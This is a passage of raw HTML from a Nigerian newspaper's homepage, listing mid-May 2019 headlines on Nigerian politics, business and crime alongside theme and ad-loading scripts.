<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652421 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sunday-magazine/worship/">Worship</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403619 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/education-news-nigeria/">Education</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403664 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/nigeria-universities-breaking-news/">Campus Life</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652398 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/online-special/">Online Special</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1037022 bgnav" data-item-row="default"><a href="http://community.thenationonlineng.net/forum/">Forum</a></li> </ul></div></div> </div> </div> <div class="jeg_nav_col jeg_nav_center jeg_nav_normal"> <div class="item_wrap jeg_nav_aligncenter"> </div> </div> <div class="jeg_nav_col jeg_nav_right jeg_nav_normal"> <div class="item_wrap jeg_nav_alignright"> <div class="jeg_nav_item jeg_search_wrapper search_icon jeg_search_popup_expand"> <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a> <form action="https://thenationonlineng.net/" method="get" class="jeg_search_form" target="_top"> <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off"> <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button> </form> <div class="jeg_search_result jeg_search_hide with_result"> <div class="search-result-wrapper"> </div> <div class="search-link search-noresult"> No Result </div> <div class="search-link search-all-button"> <i class="fa fa-search"></i> View All Result </div> </div></div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="jeg_navbar_mobile_wrapper"> <div class="jeg_navbar_mobile" data-mode="scroll"> <div class="jeg_mobile_bottombar jeg_mobile_midbar jeg_container dark"> <div class="container"> <div class="jeg_nav_row"> <div class="jeg_nav_col jeg_nav_left jeg_nav_normal"> <div class="item_wrap jeg_nav_alignleft"> <div class="jeg_nav_item"> <a href="#" class="toggle_btn jeg_mobile_toggle"><i class="fa fa-bars"></i></a> </div> </div> </div> <div class="jeg_nav_col jeg_nav_center jeg_nav_grow"> <div class="item_wrap jeg_nav_aligncenter"> <div class="jeg_nav_item jeg_mobile_logo"> <h1 class="site-title"> <a href="https://thenationonlineng.net/"> <img src="" srcset=" 1x, https://thenationonlineng.net/wp-content/uploads/2019/04/trans-tn.fw_.fw_-1.png 2x" alt="The Nation Newspaper"> </a> </h1> </div> </div> </div> <div class="jeg_nav_col jeg_nav_right jeg_nav_normal"> <div class="item_wrap jeg_nav_alignright"> <div class="jeg_nav_item jeg_search_wrapper jeg_search_popup_expand"> <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a> <form action="https://thenationonlineng.net/" method="get" class="jeg_search_form" target="_top"> <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off"> <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button> </form> <div class="jeg_search_result jeg_search_hide with_result"> <div class="search-result-wrapper"> </div> <div class="search-link search-noresult"> No Result </div> <div class="search-link search-all-button"> <i class="fa fa-search"></i> View All Result </div> </div></div> </div> </div> </div> </div> </div></div> <div class="sticky_blankspace" style="height: 60px;"></div> </div> <div class="jeg_main"> <div class="jeg_container"> <div class="jeg_content"> <div class="jeg_vc_content"> <div class="row vc_row vc_custom_1535354015743"><div class="jeg-vc-wrapper"><div class="wpb_column jeg_column vc_column_container vc_col-sm-8 jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 vc_hidden-lg vc_hidden-md"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_28 jeg_postblock jeg_module_hook jeg_pagination_loadmore jeg_col_2o3 jnews_module_915165_0_5cdd84c42fce2 vc_custom_1557839518540 " data-unique="jnews_module_915165_0_5cdd84c42fce2"> <div class="jeg_block_heading jeg_block_heading_1 jeg_subcat_right"> <h3 class="jeg_block_title"><span>Latest News</span></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts "> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1041276 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update tag-nigeria-news tag-nigerian-newspaper tag-ninth-senate tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ninth-assembly-lawan-to-unfold-legislative-agenda/">Ninth Assembly: Lawan to unfold legislative agenda</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/ninth-assembly-lawan-to-unfold-legislative-agenda/"><i class="fa fa-clock-o"></i> 4:34 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041274 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/">FG’ll improve ease of doing business, says Buhari</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/"><i class="fa fa-clock-o"></i> 4:33 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041269 post type-post status-publish format-standard has-post-thumbnail hentry category-politics tag-godwin-obaseki tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper tag-yakubu-gowon"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/edo-2020-gowon-endorses-obaseki-for-second-term/">Edo 2020: Gowon endorses Obaseki for second term</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/edo-2020-gowon-endorses-obaseki-for-second-term/"><i class="fa fa-clock-o"></i> 4:27 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041265 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news-update tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/">50-yr-old woman arrested for maid trafficking</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/"><i class="fa fa-clock-o"></i> 4:26 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041264 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-politics tag-ike-ekweremadu tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper tag-the-nation-nigeria"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/constituents-to-ekweremadu-well-decide-when-you-should-retire-from-senate/">Constituents to Ekweremadu: We’ll decide when you should retire from Senate</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/constituents-to-ekweremadu-well-decide-when-you-should-retire-from-senate/"><i class="fa fa-clock-o"></i> 4:21 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041249 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-airstrikes"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/">Saudi-led airstrikes pound Sana’a, Yemen’s capital</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/"><i class="fa fa-clock-o"></i> 4:18 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041255 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/">Breaking: MTN Nigeria gains N184b in listing rally</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/"><i class="fa fa-clock-o"></i> 4:12 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041236 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/sack-of-2000-workers-in-ekiti-height-of-wickedness-says-fayose/">Sack of 2,000 workers in Ekiti height of wickedness, says Fayose</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/sack-of-2000-workers-in-ekiti-height-of-wickedness-says-fayose/"><i class="fa fa-clock-o"></i> 3:52 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041231 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-cybercrime"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/">Cybercrime suspects unleash dog on EFCC operatives</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/"><i class="fa fa-clock-o"></i> 3:44 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041223 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news category-news-update tag-nigeria-news tag-nigeria-newspaper tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/">Abdulrazaq didn’t forge WAEC certificate, says INEC</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/"><i class="fa fa-clock-o"></i> 3:31 pm</a></div></div> </div> </article><div class='jeg_ad jeg_ad_module jeg_ajax_loaded anim_10'><div class='ads-wrapper'><div class=""> <style type='text/css' scoped> .adsslot_GkHFxYu8vq{ width:728px !important; height:90px !important; } @media (max-width:1199px) { .adsslot_GkHFxYu8vq{ width:468px !important; height:60px !important; } } @media (max-width:767px) { .adsslot_GkHFxYu8vq{ width:320px !important; height:50px !important; } } </style> <ins class="adsbygoogle adsslot_GkHFxYu8vq" style="display:inline-block;" data-ad-client="ca-pub-5089981496810613" data-ad-slot="4727903770"></ins> <script async src='//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'></script> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> </div></div></div><article class="jeg_post jeg_pl_xs_4 post-1041219 post type-post status-publish format-standard has-post-thumbnail hentry category-infotech tag-opera-limited"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/over-30million-users-to-enjoy-new-opera-ad/">Over 30million users to enjoy new opera ad</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/over-30million-users-to-enjoy-new-opera-ad/"><i class="fa fa-clock-o"></i> 3:27 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041203 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-court tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-appeal-court-upholds-death-sentence-for-ex-nnpc-staff/">Breaking: Appeal Court upholds death sentence for ex-NNPC staff</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/breaking-appeal-court-upholds-death-sentence-for-ex-nnpc-staff/"><i class="fa fa-clock-o"></i> 3:24 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041209 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-ambode tag-lagos tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/why-we-remove-structures-to-fix-road-by-lasg/">Why we remove structures to fix road, by LASG</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/why-we-remove-structures-to-fix-road-by-lasg/"><i class="fa fa-clock-o"></i> 3:18 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041212 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment tag-laura-ikeji-kanu"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/our-lives-are-not-perfect-laura-ikeji-sm-influencer-tells-fans/">`Our lives are not perfect’, Laura Ikeji, SM influencer tells fans</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/our-lives-are-not-perfect-laura-ikeji-sm-influencer-tells-fans/"><i class="fa fa-clock-o"></i> 3:14 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041210 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-loom-ponzi tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/beware-of-loom-ponzi-scheme-sec-warns-nigerians/">Beware of Loom ponzi scheme, SEC warns Nigerians</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/beware-of-loom-ponzi-scheme-sec-warns-nigerians/"><i class="fa fa-clock-o"></i> 3:11 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041204 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ekiti-sacks-over-2-000-workers-appointed-by-fayose/">Breaking: Ekiti sacks over 2, 000 workers appointed by Fayose</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/ekiti-sacks-over-2-000-workers-appointed-by-fayose/"><i class="fa fa-clock-o"></i> 2:47 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041194 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/lagos-assembly-set-to-address-building-collapse-with-laws-regulations/">Lagos Assembly set to address building collapse with laws, regulations</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/lagos-assembly-set-to-address-building-collapse-with-laws-regulations/"><i class="fa fa-clock-o"></i> 2:31 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041184 post type-post status-publish format-standard has-post-thumbnail hentry category-online-special tag-force-feeding-babies"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/force-feeding-babies-a-dangerous-practice/">Force-feeding Babies: A Dangerous Practice</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/force-feeding-babies-a-dangerous-practice/"><i class="fa fa-clock-o"></i> 2:11 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041188 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/social-media-addicts-susceptible-to-mental-health-challenges/">&#8216;Social media addicts susceptible to mental health challenges&#8217;</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/social-media-addicts-susceptible-to-mental-health-challenges/"><i class="fa fa-clock-o"></i> 2:10 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041182 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/updated-senate-confirms-emefieles-reappointment-as-cbn-governor/">Updated: Senate confirms Emefiele’s reappointment as CBN Governor</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/updated-senate-confirms-emefieles-reappointment-as-cbn-governor/"><i class="fa fa-clock-o"></i> 1:57 pm</a></div></div> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> <div class="jeg_block_loadmore "> <a href="#" class='' data-load='Load More' data-loading='Loading...'> Load More</a> </div> </div> <script>var jnews_module_915165_0_5cdd84c42fce2 = {"header_icon":"","first_title":"Latest News","second_title":"","url":"","header_type":"heading_1","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"20","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","show_date":"yes","date_format":"custom","date_format_custom":"g:i a","pagination_mode":"loadmore","pagination_nextprev_showtext":"","pagination_number_post":"5","pagination_scroll_limit":0,"ads_type":"googleads","ads_position":"10","ads_random":"","ads_image":"","ads_image_tablet":"","ads_image_phone":"","ads_image_link":"","ads_image_alt":"","ads_image_new_tab":"","google_publisher_id":"ca-pub-5089981496810613","google_slot_id":"4727903770","google_desktop":"auto","google_tab":"auto","google_phone":"auto","content":"","ads_bottom_text":"","boxed":"","boxed_shadow":"","show_border":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":".vc_custom_1557839518540{padding-right: 10px !important;padding-left: 10px !important;background-color: #ffffff !important;}","compatible_column_notice":"","paged":1,"column_class":"jeg_col_2o3","class":"jnews_block_28"};</script> </div><div class='jeg_ad jeg_ad_module jnews_module_915165_1_5cdd84c4b4652 '><div class='ads-wrapper'><div class=''><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-5089981496810613" data-ad-slot="4727903770" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div></div><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_2o3 jnews_module_915165_2_5cdd84c4b4c3b " data-unique="jnews_module_915165_2_5cdd84c4b4c3b"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><span>Featured</span></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts jeg_load_more_flag"> <article class="jeg_post jeg_pl_md_box post-1041255 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="175" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="remittances, MTN, Court" data-src="https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1.jpg 600w, https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1-300x150.jpg 300w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/">Breaking: MTN Nigeria gains N184b in listing rally</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article><article class="jeg_post jeg_pl_md_box post-1041223 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news category-news-update tag-nigeria-news tag-nigeria-newspaper tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Abdulrazaq" data-src="https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-800x570.jpg 800w, https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-750x536.jpg 750w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/">Abdulrazaq didn’t forge WAEC certificate, says INEC</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041203 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-court tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-appeal-court-upholds-death-sentence-for-ex-nnpc-staff/">Breaking: Appeal Court upholds death sentence for ex-NNPC staff</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041210 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-loom-ponzi tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/beware-of-loom-ponzi-scheme-sec-warns-nigerians/">Beware of Loom ponzi scheme, SEC warns Nigerians</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041204 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ekiti-sacks-over-2-000-workers-appointed-by-fayose/">Breaking: Ekiti sacks over 2, 000 workers appointed by Fayose</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041182 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/updated-senate-confirms-emefieles-reappointment-as-cbn-governor/">Updated: Senate confirms Emefiele’s reappointment as CBN Governor</a> </h3> </div> </article> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_2_5cdd84c4b4c3b = {"header_icon":"","first_title":"Featured","second_title":"","url":"","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"128","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_2o3","class":"jnews_block_24"};</script> </div><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_2o3 jnews_module_915165_3_5cdd84c4d5fea " data-unique="jnews_module_915165_3_5cdd84c4d5fea"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><span>News</span></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts jeg_load_more_flag"> <article class="jeg_post jeg_pl_md_box post-1041274 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="train and railway services to easy business" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-750x536.jpg 750w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/">FG’ll improve ease of doing business, says Buhari</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article><article class="jeg_post jeg_pl_md_box post-1041249 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-airstrikes"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Airstrikes Saudi" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-750x536.jpg 750w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/">Saudi-led airstrikes pound Sana’a, Yemen’s capital</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041236 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/sack-of-2000-workers-in-ekiti-height-of-wickedness-says-fayose/">Sack of 2,000 workers in Ekiti height of wickedness, says Fayose</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041223 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news category-news-update tag-nigeria-news tag-nigeria-newspaper tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/">Abdulrazaq didn’t forge WAEC certificate, says INEC</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041209 post type-post status-publish 